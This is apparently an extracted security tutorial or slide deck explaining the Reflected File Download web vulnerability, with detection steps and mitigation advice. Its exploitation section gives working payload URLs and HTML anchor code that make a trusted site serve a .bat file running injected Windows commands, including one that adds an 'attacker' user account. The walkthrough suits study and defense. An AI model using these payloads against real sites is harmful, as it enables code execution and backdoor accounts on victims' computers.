Reflected File Download Vulnerability Web Application Vulnerability

1. Reflected File Download
1
Reflected File Download Vulnerability
Narendra Bhati
@imnarendrabhati
https://websecgeeks.com
narendra.bhati@websecgeeks.com
HTTP/1.1 200 OK
Content-Type: application/json;
Content-Disposition: attachment
We will talk about Reflected File Download Vulnerability which is quite
less known for most of the researchers. We will see how we can find this
vulnerability, and actually make an exploit to present the impact in real
world scenario.

2. Reflected File Download
2
Contents: Page No
1. Abstract 3
2. Introduction 4
3. Analysis 6
4. Exploitation 9
5. Mitigation 13

3. Reflected File Download
3

4. Reflected File Download
4
1. Abstract
Modern applications are widely used in today time, mostly as a
business requirement. We have also seen many application API calls,
JSON based architecture for better speed and interactive usability for
users, which make their using experience better.
As the famous lines from spider man goes: “With Great Power Comes
Great Responsibility”. And that phase can be also applied in this topic.
Despite efforts to strengthen the security, the modern web applications
are still a victim of many attacks and they will be for many years to
come.

5. Reflected File Download
5
2. Introduction About RFD:
Reflected File Download Vulnerability: This vulnerability allows an
attacker to trick any user to download some malicious file. This
vulnerability was discovered by Oren Hafif and he also presented this
vulnerability in back hat europe 2014.
RDF vulnerability allows an attacker by tricking the victim to download
a malicious file or script from a trusted domain. In simple words an
attacker can abuse the trust of trust domain/host to target his
user/visitors by tricking them to download a malicious file which
attacks on their system.
For better understanding RFD we will divide the vulnerability into three
parts: Reflected, File and Download.
Let’s start:
A. Reflected:
As you can see in this screenshot, the user input “download” parameter
value is actually reflecting back into the response as part of JSON Array.

6. Reflected File Download
6
JSON is a format for storing and transporting data.JSON is often used
when data is sent from a server to a web page.Its make web application
more flexible and load faster.Typical JSON array looks like this
{"firstName":"narendra", "lastName":"bhati"}
For RFD to work, the reponse should be in JSON as you can see below.
{"firstName":"narendra", "lastName":"bhati"}
This is the first requirement to find/approach for Reflected File
Download Vulnerability.
Info: download parameter value reflecting back into the http response
as json array.
This type of input is mostly looks like
http://anysite.com/home/search?givemevalue=iambhati&country=indi
a
http://anysite.com/home/search?givemevalue=iambhati&country=indi
a
Now this is possible that parameter “country” can be reflected back into
the http response as JSON Array.

7. Reflected File Download
7
B. File:
This is the most important thing, which we should look for in the
Reflected File Download Vulnerability.
The application should allow us to input special characters like semi
columns “;”, slashes “/” and question mark “?”. Now why this is
important, We will discuss in analysis part.
C. Download
The response should be in downloadable form with user input value, as
you can see below. (I used the Chrome Browser)
Info: Response is downloadable & inputted value is also reflecting back
in download file

8. Reflected File Download
8
But there is an issue with downloadable file. After observing this
behavior first look for the http response for “Content-Disposition”
header.
If this header is present in the http response, then it will instruct the
browser to set a file name to the downloaded file, which can act as a
barrier for us.
Let's move to the analysis part.
3. Analysis:
Finding RFD is pretty easy task, if you approach it in a good way.
RFD are mostly presented on modern web applications like JSON , API
Calls, Every end point which takes user input dramatically. For finding
such end points you should always keep eye on your proxies like Burp
Suite, OWASP Zap etc.
If you have carefully read the introduction part, then it will be easy for
you to understand this attack.
Below is a typical JSON based application, which is taking user input
from parameter “download”
URL Is –
http://iamvulnerable.net/home/account/search?download=howareyo
u

9. Reflected File Download
9
As we have observed that our input is reflecting back into the http
response. That great first requirement is found.
Our second requirement is that the response should be in downloadable
form and the target application having the same functionality
Our input is reflecting back into the downloadable file without any
extension.
Now here the typical part comes in the picture. As 3rd requirement the
application should allow us to enter any special characters like “;”, “?”,
“/”

10. Reflected File Download
10
As we already know that our user input is reflecting back into the
download file without any file extension. Then now we have to look that,
Can we control the filename from URL itself.
But why are using “;” “/” “?” because when application does not respond
with “content-disposition” header then if there browser will try to get
the filename from URL itself.
To test this we have perform some blind tries like.
http://iamvulnerable.net/home/account/searchrfdtest.bat?download=
howareyou
http://iamvulnerable.net/home/account/search;rfdtest.bat?download=
howareyou
http://iamvulnerable.net/home/account/;searchrfdtest.bat?download=
howareyou
http://iamvulnerable.net/home/account/;search;rfdtest.bat?download
=howareyou
http://iamvulnerable.net/home/account/searchrfdtest.bat?download=
howareyou
http://iamvulnerable.net/home/account/search;/rfdtest.bat?download
=howareyo
To be honest there is not particular way to triaged this vulnerability, But
you can perform the same type of approach by changing the vector,
because all applications are having the different behavior.
After some times we found that this payload works
http://iamvulnerable.net/home/account/searchrfdtest.bat?download=
howareyou

11. Reflected File Download
11
And downloaded file is now in “bat” format as you can see below.
Info: Downloaded file is now as “bat” format.
Now if you open the same file in like “notepad” then you will find the
same user input in that “bat” file.

12. Reflected File Download
12
Finally we got all our 3 requirements.
● We can control the user input.
● We can control the file extension.
● We have the downloadable response.
4. Exploitation
Who knows how to play with sword, can do many kills.
After getting all 3 requirements, now it's time to exploit this
vulnerability.
If you observe the behavior of the “bat” file, Then you will realized that
any command present in the bat file, will be executed directly in
windows shell!
Like there is a file called “mkdir.bat”, This file contents these code
“mkdir tmp”.
Now whenever this file will get executed , The code will interact with
the windows shell and create a new folder called “tmp”.
Same like this, If you observe our user input response in downloaded
file, You will get to know that we can also inject our custom command
there.

13. Reflected File Download
13
http://iamvulnerable.net/home/account/searchrfdtest.bat?download=
”||calc||
Info: We enter “||calc|| in the download parameter, Which can be save
in that file.
In os shell, We can use double commands in single line, Like we can use
“ dir ; date”, This command will execute dir first then date.
Just like this, We can inject a custom payload of command in user input
which will act as double command. As you can see below, I have used
“||calc||.
Because double quite will separate out this input and break the syntax.
Then I have added double pipes, This is an double command operator
which will instruct the os shell like this

14. Reflected File Download
14
Invalidcommand || dir
Execute Command B If Command A Failed. So as per our payload
{“owasp”:[“rfd”,””||calc||”,”demo”]}
Now when this bat file get executed windows shell will first try to
execute {“owasp”:[“rfd”,”” which is not a valid command so it will get
failed then window shell will try to execute second command which is
“calc” which will directly execute the calculator program.
Info: File name is rfd2.bat and input value is “||calc|| which will saved as
“bat”

15. Reflected File Download
15
Info: After executing that file, The calculator got executed.
We have successfully executed calculator from using Reflected File
Download Vulnerability.
Now you can use your imagination that in how you can use this
vulnerability to perform some malicious task on victim computer.
For demonstration, We will create an account in victim computer.
Before this lets check victim user account.

16. Reflected File Download
16
Now we create a new payload just like calc which we did recently.
http://iamvulnerable.net/home/account/searchrfdtest.bat?download=
”||net user attacker attacker /add||
After executing this URL a file will be download as “bat”, as you can see
below

17. Reflected File Download
17
Info: We use another payload which will create an account as attacker
username
After executing this file, Some thing will happened and gone. Now again
lets check the Victim user account.

18. Reflected File Download
18
Oops we have another user account with attacker.
We can use other browsers with some modification for RFD To work,
Using HTML5 download attributes like below
This code can use in Opera & Chrome, After clicking on this, A file will
download as setup.bat
<a href="
http://iamvulnerable.net/home/account/searchrfdtest.bat?download=
”||net user attacker attacker /add||"
download="setup.bat">Download</a>;
Due to browser behaviors, some browser need to get the download in
different way, for firefox we can use below code.
<a href="
http://iamvulnerable.net/home/account/searchrfdtest.bat?download=
”||net user attacker attacker /add||" download="setup.bat"
onclick="return false">Download</a>
6. Mitigation

19. Reflected File Download
19
Add Content-Dispositions: attachment; filename header which will
prevent the attacker to control the file extension.
Don’t allow the application to take permissive input.
Limit the callback function for “;” “
Conclusion
After analysis of this vulnerability, We can say there is always a
vulnerability/weaknees in modern web applications dosnt matter in which
platform they are made. We should look for every possiblity for every
attack.
Still many organisation think its not a vulnerability because this is affecting
the user/victim machine not the application itself, But After a close look we
can say This vulnerability is happening because of the vulnerable application
and this affecting on their user.There is an another matter of thinking that
this vulnerability is exploiting the trust of the user which they website they
are visiting most.
Source: https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-
Reflected-File-Download-A-New-Web-Attack-Vector.pdf
Narendra Bhati
@imnarendrabhati
https://websecgeeks.com
narendra.bhati@websecgeeks.com